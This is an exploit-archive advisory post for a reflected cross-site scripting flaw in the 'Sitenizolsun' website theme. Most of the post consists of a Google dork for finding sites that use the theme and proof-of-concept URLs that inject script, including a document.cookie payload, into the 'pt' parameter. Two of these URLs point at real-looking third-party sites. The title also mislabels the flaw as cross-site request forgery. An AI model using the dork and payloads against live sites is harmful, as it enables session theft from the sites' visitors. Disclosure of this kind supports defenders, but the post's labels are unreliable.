Sitenizolsun thema XSS Cross site request forgery

2018.08.28

Anonymous7480 (TR)

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

Dork: inurl:Yer sağlayıcı: SitenizOlsun

# Exploit Title: Sitenizolsun thema XSS Cross site request forgery
# Google Dork: inurl:Yer sağlayıcı: SitenizOlsun
# Date: 27.08.2018
# Exploit Author: Furkan Özer // Prototyqe
# Vendor Homepage: https://www.yurdumyazilim.com/
# Version: ALL
# Tested on: Windows 10-Linux Kali
#
#
#
# http://www.testsite.com/?SyfNmb=2&pt=hakımızdaa
#
#
#
# http://www.testsite.com/?SyfNmb=2&pt=<script>alert(document.cookie)</script>
#
# http://www.afyontaksi.org/?SyfNmb=2&pt=Hakk%C4%B1m%C4%B1zda
#
#
# http://www.malatyasportaraftarlardernegi.com/?Syf=4&pt=%22%3E%3CScript%3Ealert();%3C/script%3E

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Sitenizolsun thema XSS Cross site request forgery

Dork: inurl:Yer sağlayıcı: SitenizOlsun

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.